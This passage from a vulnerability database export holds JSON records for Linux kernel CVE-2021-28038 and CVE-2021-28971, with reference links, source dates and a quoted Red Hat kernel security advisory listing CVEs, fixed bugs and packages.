      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.openwall.com/lists/oss-security/2021/03/05/1"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20210409-0001/"
      },
      {
        "trust": 1.7,
        "url": "http://xenbits.xen.org/xsa/advisory-367.html"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00010.html"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00035.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28038"
      },
      {
        "trust": 1.0,
        "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=2991397d23ec597405b116d96de3813420bdcbc3"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0837"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1624"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1228"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1766"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162981/ubuntu-security-notice-usn-4984-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1964"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1655"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1307"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1669"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162695/ubuntu-security-notice-usn-4945-2.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2136"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1089"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1101"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162163/ubuntu-security-notice-usn-4904-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1299"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1694"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162541/ubuntu-security-notice-usn-4945-1.html"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30002"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28375"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25639"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29265"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29650"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28660"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28950"
      },
      {
        "trust": 0.2,
        "url": "https://ubuntu.com/security/notices/usn-4945-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28688"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-26931"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-26930"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4911-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1021.22"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1035.38"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1035.38~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4945-2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1033.35"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28972"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28952"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4984-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-55.62"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1028.30"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1035.37"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28964"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1031.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1032.34"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33033"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-55.62~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29647"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31916"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3483"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28971"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5967"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1350"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4904-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1126.140"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1150.161"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16644"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20261"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16231"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19061"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1091.100"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1154.164"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-208.240"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-13095"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16232"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1085.90"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4946-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1099.112"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20292"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1102.109"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-143.147"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1102.111"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1071.79"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-dell300x/4.15.0-1018.22"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1114.127"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29264"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1091.93"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1047.49~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1043.45"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1047.49"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1043.46~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1015.16"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop-5.4/5.4.0-1015.16~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1044.47~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1043.46"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1048.50~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.4.0-73.82"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1039.40"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-73.82~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1045.49"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.4/5.4.0-1043.45~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1048.50"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387389"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003871"
      },
      {
        "db": "PACKETSTORM",
        "id": "162167"
      },
      {
        "db": "PACKETSTORM",
        "id": "162695"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162163"
      },
      {
        "db": "PACKETSTORM",
        "id": "162542"
      },
      {
        "db": "PACKETSTORM",
        "id": "162541"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-474"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28038"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-387389"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003871"
      },
      {
        "db": "PACKETSTORM",
        "id": "162167"
      },
      {
        "db": "PACKETSTORM",
        "id": "162695"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162163"
      },
      {
        "db": "PACKETSTORM",
        "id": "162542"
      },
      {
        "db": "PACKETSTORM",
        "id": "162541"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-474"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28038"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-03-05T00:00:00",
        "db": "VULHUB",
        "id": "VHN-387389"
      },
      {
        "date": "2021-11-09T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-003871"
      },
      {
        "date": "2021-04-13T22:55:55",
        "db": "PACKETSTORM",
        "id": "162167"
      },
      {
        "date": "2021-05-19T14:19:27",
        "db": "PACKETSTORM",
        "id": "162695"
      },
      {
        "date": "2021-06-04T22:09:37",
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "date": "2021-04-13T20:22:22",
        "db": "PACKETSTORM",
        "id": "162163"
      },
      {
        "date": "2021-05-12T13:50:51",
        "db": "PACKETSTORM",
        "id": "162542"
      },
      {
        "date": "2021-05-12T13:50:45",
        "db": "PACKETSTORM",
        "id": "162541"
      },
      {
        "date": "2021-03-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202103-474"
      },
      {
        "date": "2021-03-05T18:15:13.127000",
        "db": "NVD",
        "id": "CVE-2021-28038"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-05-16T00:00:00",
        "db": "VULHUB",
        "id": "VHN-387389"
      },
      {
        "date": "2021-11-09T05:47:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-003871"
      },
      {
        "date": "2021-06-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202103-474"
      },
      {
        "date": "2024-03-25T01:15:50.380000",
        "db": "NVD",
        "id": "CVE-2021-28038"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162167"
      },
      {
        "db": "PACKETSTORM",
        "id": "162695"
      },
      {
        "db": "PACKETSTORM",
        "id": "162163"
      },
      {
        "db": "PACKETSTORM",
        "id": "162541"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-474"
      }
    ],
    "trust": 1.0
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Xen\u00a0PV\u00a0 Used in \u00a0Linux\u00a0Kernel\u00a0\u00a0 Vulnerability in resource allocation without restrictions or throttling in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003871"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-474"
      }
    ],
    "trust": 0.6
  }
}

var-202103-1243
Vulnerability from variot

In intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c in the Linux kernel through 5.11.8 on some Haswell CPUs, userspace applications (such as perf-fuzzer) can cause a system crash because the PEBS status in a PEBS record is mishandled, aka CID-d88d05a9e0b6. Linux Kernel Exists in a resource exhaustion vulnerability. Vendor exploits this vulnerability CID-d88d05a9e0b6 It is published as.Service operation interruption (DoS) It may be in a state. 8) - x86_64

  1. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es): * kernel: out-of-bounds reads in pinctrl subsystem. Bugs fixed (https://bugzilla.redhat.com/):

2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value

  1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Moderate: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2021:4356-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:4356 Issue date: 2021-11-09 CVE Names: CVE-2020-0427 CVE-2020-24502 CVE-2020-24503 CVE-2020-24504 CVE-2020-24586 CVE-2020-24587 CVE-2020-24588 CVE-2020-26139 CVE-2020-26140 CVE-2020-26141 CVE-2020-26143 CVE-2020-26144 CVE-2020-26145 CVE-2020-26146 CVE-2020-26147 CVE-2020-27777 CVE-2020-29368 CVE-2020-29660 CVE-2020-36158 CVE-2020-36386 CVE-2021-0129 CVE-2021-3348 CVE-2021-3489 CVE-2021-3564 CVE-2021-3573 CVE-2021-3600 CVE-2021-3635 CVE-2021-3659 CVE-2021-3679 CVE-2021-3732 CVE-2021-20194 CVE-2021-20239 CVE-2021-23133 CVE-2021-28950 CVE-2021-28971 CVE-2021-29155 CVE-2021-29646 CVE-2021-29650 CVE-2021-31440 CVE-2021-31829 CVE-2021-31916 CVE-2021-33200 ==================================================================== 1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64 Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64

Security Fix(es): * kernel: out-of-bounds reads in pinctrl subsystem (CVE-2020-0427) * kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24502) * kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24503) * kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24504) * kernel: Fragmentation cache not cleared on reconnection (CVE-2020-24586) * kernel: Reassembling fragments encrypted under different keys (CVE-2020-24587) * kernel: wifi frame payload being parsed incorrectly as an L2 frame (CVE-2020-24588) * kernel: Forwarding EAPOL from unauthenticated wifi client (CVE-2020-26139) * kernel: accepting plaintext data frames in protected networks (CVE-2020-26140) * kernel: not verifying TKIP MIC of fragmented frames (CVE-2020-26141) * kernel: accepting fragmented plaintext frames in protected networks (CVE-2020-26143) * kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header (CVE-2020-26144) * kernel: accepting plaintext broadcast fragments as full frames (CVE-2020-26145) * kernel: powerpc: RTAS calls can be used to compromise kernel integrity (CVE-2020-27777) * kernel: locking inconsistency in tty_io.c and tty_jobctrl.c can lead to a read-after-free (CVE-2020-29660) * kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function via a long SSID value (CVE-2020-36158) * kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() (CVE-2020-36386) * kernel: Improper access control in BlueZ may allow information disclosure vulnerability. (CVE-2021-0129) * kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c (CVE-2021-3348) * kernel: Linux kernel eBPF RINGBUF map oversized allocation (CVE-2021-3489) * kernel: double free in bluetooth subsystem when the HCI device initialization fails (CVE-2021-3564) * kernel: use-after-free in function hci_sock_bound_ioctl() (CVE-2021-3573) * kernel: eBPF 32-bit source register truncation on div/mod (CVE-2021-3600) * kernel: DoS in rb_per_cpu_empty() (CVE-2021-3679) * kernel: Mounting overlayfs inside an unprivileged user namespace can reveal files (CVE-2021-3732) * kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt() (CVE-2021-20194) * kernel: Race condition in sctp_destroy_sock list_del (CVE-2021-23133) * kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode (CVE-2021-28950) * kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c (CVE-2021-28971) * kernel: protection can be bypassed to leak content of kernel memory (CVE-2021-29155) * kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c (CVE-2021-29646) * kernel: lack a full memory barrier may lead to DoS (CVE-2021-29650) * kernel: local escalation of privileges in handling of eBPF programs (CVE-2021-31440) * kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory (CVE-2021-31829) * kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier (CVE-2021-33200) * kernel: reassembling encrypted fragments with non-consecutive packet numbers (CVE-2020-26146) * kernel: reassembling mixed encrypted/plaintext fragments (CVE-2020-26147) * kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check (CVE-2020-29368) * kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50 (CVE-2021-3635) * kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c (CVE-2021-3659) * kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure (CVE-2021-20239) * kernel: out of bounds array access in drivers/md/dm-ioctl.c (CVE-2021-31916)

  1. Solution:

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.5 Release Notes linked from the References section.

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1509204 - dlm: Add ability to set SO_MARK on DLM sockets 1793880 - Unreliable RTC synchronization (11-minute mode) 1816493 - [RHEL 8.3] Discard request from mkfs.xfs takes too much time on raid10 1900844 - CVE-2020-27777 kernel: powerpc: RTAS calls can be used to compromise kernel integrity 1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check 1906522 - CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free 1912683 - CVE-2021-20194 kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt() 1913348 - CVE-2020-36158 kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value 1915825 - Allow falling back to genfscon labeling when the FS doesn't support xattrs and there is a fs_use_xattr rule for it 1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem. 1921958 - CVE-2021-3348 kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c 1923636 - CVE-2021-20239 kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure 1930376 - CVE-2020-24504 kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers 1930379 - CVE-2020-24502 kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers 1930381 - CVE-2020-24503 kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers 1933527 - Files on cifs mount can get mixed contents when underlying file is removed but inode number is reused, when mounted with 'serverino' and 'cache=strict ' 1939341 - CNB: net: add inline function skb_csum_is_sctp 1941762 - CVE-2021-28950 kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode 1941784 - CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c 1945345 - CVE-2021-29646 kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c 1945388 - CVE-2021-29650 kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS 1946965 - CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c 1948772 - CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del 1951595 - CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory 1953847 - [ethtool] The NLM_F_MULTI should be used for NLM_F_DUMP 1954588 - RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. 1957788 - CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory 1959559 - CVE-2021-3489 kernel: Linux kernel eBPF RINGBUF map oversized allocation 1959642 - CVE-2020-24586 kernel: Fragmentation cache not cleared on reconnection 1959654 - CVE-2020-24587 kernel: Reassembling fragments encrypted under different keys 1959657 - CVE-2020-24588 kernel: wifi frame payload being parsed incorrectly as an L2 frame 1959663 - CVE-2020-26139 kernel: Forwarding EAPOL from unauthenticated wifi client 1960490 - CVE-2020-26140 kernel: accepting plaintext data frames in protected networks 1960492 - CVE-2020-26141 kernel: not verifying TKIP MIC of fragmented frames 1960496 - CVE-2020-26143 kernel: accepting fragmented plaintext frames in protected networks 1960498 - CVE-2020-26144 kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header 1960500 - CVE-2020-26145 kernel: accepting plaintext broadcast fragments as full frames 1960502 - CVE-2020-26146 kernel: reassembling encrypted fragments with non-consecutive packet numbers 1960504 - CVE-2020-26147 kernel: reassembling mixed encrypted/plaintext fragments 1960708 - please add CAP_CHECKPOINT_RESTORE to capability.h 1964028 - CVE-2021-31440 kernel: local escalation of privileges in handling of eBPF programs 1964139 - CVE-2021-3564 kernel: double free in bluetooth subsystem when the HCI device initialization fails 1965038 - CVE-2021-0129 kernel: Improper access control in BlueZ may allow information disclosure vulnerability. 1965360 - kernel: get_timespec64 does not ignore padding in compat syscalls 1965458 - CVE-2021-33200 kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier 1966578 - CVE-2021-3573 kernel: use-after-free in function hci_sock_bound_ioctl() 1969489 - CVE-2020-36386 kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c 1971101 - ceph: potential data corruption in cephfs write_begin codepath 1972278 - libceph: allow addrvecs with a single NONE/blank address 1974627 - [TIPC] kernel BUG at lib/list_debug.c:31! 1975182 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer [rhel-8.5.0] 1975949 - CVE-2021-3659 kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c 1976679 - blk-mq: fix/improve io scheduler batching dispatch 1976699 - [SCTP]WARNING: CPU: 29 PID: 3165 at mm/page_alloc.c:4579 __alloc_pages_slowpath+0xb74/0xd00 1976946 - CVE-2021-3635 kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50 1976969 - XFS: followup to XFS sync to upstream v5.10 (re BZ1937116) 1977162 - [XDP] test program warning: libbpf: elf: skipping unrecognized data section(16) .eh_frame 1977422 - Missing backport of IMA boot aggregate calculation in rhel 8.4 kernel 1977537 - RHEL8.5: Update the kernel workqueue code to v5.12 level 1977850 - geneve virtual devices lack the NETIF_F_FRAGLIST feature 1978369 - dm writecache: sync with upstream 5.14 1979070 - Inaccessible NFS server overloads clients (native_queued_spin_lock_slowpath connotation?) 1979680 - Backport openvswitch tracepoints 1981954 - CVE-2021-3600 kernel: eBPF 32-bit source register truncation on div/mod 1986138 - Lockd invalid cast to nlm_lockowner 1989165 - CVE-2021-3679 kernel: DoS in rb_per_cpu_empty() 1989999 - ceph omnibus backport for RHEL-8.5.0 1991976 - block: fix New warning in nvme_setup_discard 1992700 - blk-mq: fix kernel panic when iterating over flush request 1995249 - CVE-2021-3732 kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files 1996854 - dm crypt: Avoid percpu_counter spinlock contention in crypt_page_alloc()

  1. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source: kernel-4.18.0-348.el8.src.rpm

aarch64: bpftool-4.18.0-348.el8.aarch64.rpm bpftool-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-4.18.0-348.el8.aarch64.rpm kernel-core-4.18.0-348.el8.aarch64.rpm kernel-cross-headers-4.18.0-348.el8.aarch64.rpm kernel-debug-4.18.0-348.el8.aarch64.rpm kernel-debug-core-4.18.0-348.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debug-devel-4.18.0-348.el8.aarch64.rpm kernel-debug-modules-4.18.0-348.el8.aarch64.rpm kernel-debug-modules-extra-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm kernel-devel-4.18.0-348.el8.aarch64.rpm kernel-headers-4.18.0-348.el8.aarch64.rpm kernel-modules-4.18.0-348.el8.aarch64.rpm kernel-modules-extra-4.18.0-348.el8.aarch64.rpm kernel-tools-4.18.0-348.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-tools-libs-4.18.0-348.el8.aarch64.rpm perf-4.18.0-348.el8.aarch64.rpm perf-debuginfo-4.18.0-348.el8.aarch64.rpm python3-perf-4.18.0-348.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm

noarch: kernel-abi-stablelists-4.18.0-348.el8.noarch.rpm kernel-doc-4.18.0-348.el8.noarch.rpm

